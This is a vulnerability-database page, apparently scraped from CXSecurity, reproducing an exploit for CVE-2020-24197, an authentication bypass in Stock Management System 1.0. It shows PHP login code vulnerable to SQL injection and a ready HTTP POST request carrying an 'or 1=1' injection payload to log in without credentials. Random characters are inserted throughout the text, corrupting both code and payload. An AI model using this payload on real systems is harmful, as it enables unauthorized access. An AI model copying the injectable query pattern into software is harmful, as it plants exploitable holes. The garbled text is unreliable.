Stock Management System 1.0 – Authentication Bypass – CXSecurity.com


漏洞ID


漏洞类型


发布时间


更新时间


CVE编号


CNNVD-ID


漏洞平台


CVSS评分

2145287
2020-09-05 2020-09-05
CVE-2020-24197

N/A
N/A N/A
漏洞来源

https:~ M A j H * c//cxsecurity.com/i* Q d S d G Bssue/Wg # % U ? ,LB-2020090028
漏洞详情

漏洞细节尚未披露
漏洞EXP

# Exploit TitleK } : p k G # o: Stock Manageme{ J m wnt System 1.0 - Authentim { } v I %cation Bypass
# Exploix 9 [ Dt Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: C+ V ~VE-2020-24197
# Date: September 4, 2O j z e 3 L g z c020
# Vendor Homepage: https://www.sourcecodeste7 L M - F A O Fr.com/
# SofT 8 - vtware Link: https://www.sourcecodester.com/pR = s D m G 1 z #hp/14366/stock-management-systb , 7 K T % I N !em-php.html
# Version: 1.0
# Tested) F o | Z 9 On: Windows 10 (x64_86) + XAi K @ = U EMPP 7.4.4
# Vulnerable Source Code
if($_POST) {
$username = $_POST* 9 {['username'];
$password = $_POSi f j t o F B ; 8T['password'];
if(empty($username)  empty($password)) {[ P 4 F 8
if($username == ""; H 6) {
$errors[] = "Username is require; y # C n L ^d";
}
if($password == "") {
$errors[] = "Password is re2 M J ~ z Yquired";
}
} else {
$sql = "SELECT * FROM users` 2 z { C WHERE2 ; ? X a username = '$username'";
$result = $connect->query($sql);
if($result->num[ y - z _ = X -_rows == 1) {
$` )  9 R ( / Z apassword = m$ d Ed5($password);
// exists
$mainSql = "SELECT * FROM users WHERE username = '$username' AND passwl # p . ~ M N 2ord = '$password'H : $ )";
$m[ $ + PainResult = $connect->query($mainSql);
if($mainResult->num_rows == 1)~ g k 3 A z 1 . {
$value = $mainResult->fetch_= g ^ d c # hassoc();F r u [
$user_id = $valueU ^ , $ b + R h['user_id'];
// set session
$_SESSION['k T @ wuserId'] = $user_id;
header('location: http://localhost/stock/dashboard.php');
} else{
$errors[] = "Incorrect username/password comb} : g t C 7ination";
} // /else
} else {
$errors[] = & e 0 w @ ; H"Us ^ F [ Jername doesnot exists";
} // /else
} // /else not empty username // password
} // /if $_9 0 = F `POST
?>
# Malicious POST Request ty ^ I ~ ? l % m :o https://TARGET/stock/index.php HTTP [   k |P/1.1
POST /stock/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accef f u ypt: text/html,application/xhtml+xml,application/+ * y J 6xml;q=0.9,/;q=0.N H  0 @ C O $ 58
Accept-Languagea S e i w T P 6 s: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer5 C . n p P e l: http://192.168.222.132/stock/
Content-Type: applica| 4  Jtion/x-www-l { ) m Q M c Gform-urlencoded
Content-Length: 47
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5G |  { Z & 2 3 Tkeclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d11 K  $  X o+--+admin&password=badPass